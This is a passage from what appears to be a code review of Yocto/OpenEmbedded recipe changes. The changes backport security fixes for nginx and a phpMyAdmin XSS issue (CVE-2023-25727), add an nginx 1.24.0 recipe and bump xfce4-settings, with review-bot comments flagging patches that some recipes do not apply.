-3413,6 +3550,16 @@ ngx_http_mp4_read_co64_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + atom_end = atom_table + entries * sizeof(uint64_t); + + trak = ngx_mp4_last_trak(mp4); ++ ++ if (trak->out[NGX_HTTP_MP4_STCO_ATOM].buf ++ || trak->out[NGX_HTTP_MP4_CO64_ATOM].buf) ++ { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 stco/co64 atom in \"%s\"", ++ mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + trak->chunks = entries; + + atom = &trak->co64_atom_buf; +-- +2.25.1 + diff --git a/meta-webserver/recipes-httpd/nginx/nginx.inc b/meta-webserver/recipes-httpd/nginx/nginx.inc index dfced33300..9f93c7051d 100644 --- a/meta-webserver/recipes-httpd/nginx/nginx.inc +++ b/meta-webserver/recipes-httpd/nginx/nginx.inc @@ -22,6 +22,7 @@ SRC_URI = " \ file://nginx-volatile.conf \ file://nginx.service \ file://nginx-fix-pidfile.patch \ + file://0001-configure-libxslt-conf.patch \ " inherit siteinfo update-rc.d useradd systemd @@ -43,6 +44,9 @@ PACKAGECONFIG[gunzip] = "--with-http_gunzip_module,," PACKAGECONFIG[http2] = "--with-http_v2_module,," PACKAGECONFIG[ssl] = "--with-http_ssl_module,,openssl" PACKAGECONFIG[http-auth-request] = "--with-http_auth_request_module,," +PACKAGECONFIG[stream] = "--with-stream,," + +PACKAGECONFIG[xslt] = "--with-http_xslt_module,,libxslt" do_configure () { if [ "${SITEINFO_BITS}" = "64" ]; then diff --git a/meta-webserver/recipes-httpd/nginx/nginx_1.20.1.bb b/meta-webserver/recipes-httpd/nginx/nginx_1.20.1.bb index d686c627f2..8bed04d6d8 100644 --- a/meta-webserver/recipes-httpd/nginx/nginx_1.20.1.bb +++ b/meta-webserver/recipes-httpd/nginx/nginx_1.20.1.bb @@ -1,6 +1,9 @@ require nginx.inc -SRC_URI += "file://CVE-2021-3618.patch" +SRC_URI += "file://CVE-2021-3618.patch \ + file://CVE-2022-41741-CVE-2022-41742.patch \ + file://0001-HTTP-2-per-iteration-stream-handling-limit.patch \ + " LIC_FILES_CHKSUM = "file://LICENSE;md5=206629dc7c7b3e87acb31162363ae505" 
diff --git a/meta-webserver/recipes-httpd/nginx/nginx_1.21.1.bb b/meta-webserver/recipes-httpd/nginx/nginx_1.21.1.bb index b69fd7dab0..73b5c93c90 100644 --- a/meta-webserver/recipes-httpd/nginx/nginx_1.21.1.bb +++ b/meta-webserver/recipes-httpd/nginx/nginx_1.21.1.bb @@ -1,5 +1,7 @@ require nginx.inc +SRC_URI += "file://0001-HTTP-2-per-iteration-stream-handling-limit.patch" + # 1.20.x branch is the current stable branch, the recommended default # 1.21.x is the current mainline branches containing all new features DEFAULT_PREFERENCE = "-1" diff --git a/meta-webserver/recipes-httpd/nginx/nginx_1.24.0.bb b/meta-webserver/recipes-httpd/nginx/nginx_1.24.0.bb new file mode 100644 index 0000000000..2e865e400e --- /dev/null +++ b/meta-webserver/recipes-httpd/nginx/nginx_1.24.0.bb @@ -0,0 +1,6 @@ +require nginx.inc + +LIC_FILES_CHKSUM = "file://LICENSE;md5=175abb631c799f54573dc481454c8632" + +SRC_URI[sha256sum] = "77a2541637b92a621e3ee76776c8b7b40cf6d707e69ba53a940283e30ff2f55d" + diff --git a/meta-webserver/recipes-php/phpmyadmin/phpmyadmin/CVE-2023-25727.patch b/meta-webserver/recipes-php/phpmyadmin/phpmyadmin/CVE-2023-25727.patch new file mode 100644 index 0000000000..707334a517 --- /dev/null +++ b/meta-webserver/recipes-php/phpmyadmin/phpmyadmin/CVE-2023-25727.patch 
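Review bot: `nginx_1.21.1.bb` gains only the HTTP/2 limit patch, while `CVE-2022-41741-CVE-2022-41742.patch`, which the same commit adds to `nginx_1.20.1.bb`, is not listed here. Nothing on the page indicates that the 1.21.1 source already carries the mp4 duplicate-atom checks. If the backport applies to this version, the addition should start with `SRC_URI += "file://CVE-2022-41741-CVE-2022-41742.patch \` and continue with the HTTP/2 patch entry. If the mp4 module cannot be built from this recipe (not visible in the `nginx.inc` hunks), a comment saying so would explain the omission to whoever reads the CVE report.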
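Review bot: The new `nginx_1.24.0.bb` takes its `SRC_URI` from `nginx.inc` alone, so `0001-HTTP-2-per-iteration-stream-handling-limit.patch`, which this commit adds to both `nginx_1.20.1.bb` and `nginx_1.21.1.bb`, is not applied to it. HTTP/2 can still be enabled there through `PACKAGECONFIG[http2]` in `nginx.inc`. The patch header dates the upstream change 10 Oct 2023; unless the 1.24.0 tarball is known to contain it, add `SRC_URI += "file://0001-HTTP-2-per-iteration-stream-handling-limit.patch"` after `require nginx.inc`, assuming the backport applies cleanly to this version.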
@@ -0,0 +1,37 @@
+From 0842f11158699a979437125756b26eeabedab9ab Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Maur=C3=ADcio=20Meneghini=20Fauth?= <mauricio@fauth.dev>
+Date: Fri, 5 Aug 2022 20:18:16 -0300
+Subject: [PATCH] Fix not escaped title when using drag and drop upload
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Signed-off-by: Maurício Meneghini Fauth <mauricio@fauth.dev>
+
+Upstream-Status: Backport
+CVE: CVE-2023-25727
+
+Reference to upstream patch:
+https://github.com/phpmyadmin/phpmyadmin/commit/efa2406695551667f726497750d3db91fb6f662e
+
+Signed-off-by: Dragos-Marian Panait <dragos.panait@windriver.com>
+---
+ js/src/drag_drop_import.js | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/js/src/drag_drop_import.js b/js/src/drag_drop_import.js
+index 55250c2..9b8710e 100644
+--- a/js/src/drag_drop_import.js
++++ b/js/src/drag_drop_import.js
+@@ -130,7 +130,7 @@ var DragDropImport = {
+ var filename = $this.parent('span').attr('data-filename');
+ $('body').append('<div class="pma_drop_result"><h2>' +
+ Messages.dropImportImportResultHeader + ' - ' +
+- filename + '<span class="close">x</span></h2>' + value.message + '</div>');
++ Functions.escapeHtml(filename) + '<span class="close">x</span></h2>' + value.message + '</div>');
+ $('.pma_drop_result').draggable(); // to make this dialog draggable
+ }
+ });
+--
+2.39.1
+
diff --git a/meta-webserver/recipes-php/phpmyadmin/phpmyadmin_5.1.3.bb b/meta-webserver/recipes-php/phpmyadmin/phpmyadmin_5.1.3.bb
index 7ccc05ec3e..3f19194391 100644
--- a/meta-webserver/recipes-php/phpmyadmin/phpmyadmin_5.1.3.bb
+++ b/meta-webserver/recipes-php/phpmyadmin/phpmyadmin_5.1.3.bb
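Review bot: The backport touches only `js/src/drag_drop_import.js` (diffstat: 1 file changed), while the recipe fetches the prebuilt `phpMyAdmin-${PV}-all-languages.tar.xz` release archive. If that archive also ships a compiled copy of this script (for example under `js/dist/`) and the web UI loads that copy, the unescaped `filename` concatenation stays in what is actually served, and the CVE would be reported as patched while the sink is still live. Check the unpacked source for a second `drag_drop_import.js` and apply the same `Functions.escapeHtml(filename)` change there. Separately, `value.message` is still concatenated as markup on the same line; it is presumably server-rendered HTML, but that is worth confirming.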
@@ -9,6 +9,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=b234ee4d69f5fce4486a80fdaf4a4263 \ SRC_URI = "https://files.phpmyadmin.net/phpMyAdmin/${PV}/phpMyAdmin-${PV}-all-languages.tar.xz \ file://apache.conf \ + file://CVE-2023-25727.patch \ " SRC_URI[sha256sum] = "c562feddc0f8ff5e69629113f273a0d024a65fb928c48e89ce614744d478296f" diff --git a/meta-xfce/recipes-xfce/xfce4-settings/xfce4-settings_4.16.2.bb b/meta-xfce/recipes-xfce/xfce4-settings/xfce4-settings_4.16.5.bb index aa4265f7b0..4a4e9f1883 100644 --- a/meta-xfce/recipes-xfce/xfce4-settings/xfce4-settings_4.16.2.bb +++ b/meta-xfce/recipes-xfce/xfce4-settings/xfce4-settings_4.16.5.bb @@ -9,7 +9,7 @@ inherit xfce features_check mime-xdg REQUIRED_DISTRO_FEATURES = "x11" SRC_URI += "file://0001-xsettings.xml-Set-default-themes.patch" -SRC_URI[sha256sum] = "4dd7cb420860535e687f673c0b5c0274e0d2fb67181281d4b85be9197da03d7e" +SRC_URI[sha256sum] = "7a4f74802486d7e77a1c9fa4fda19b13fc8a8dec3e5074f367e34fa82b40d28e" EXTRA_OECONF += "--enable-maintainer-mode --disable-debug" |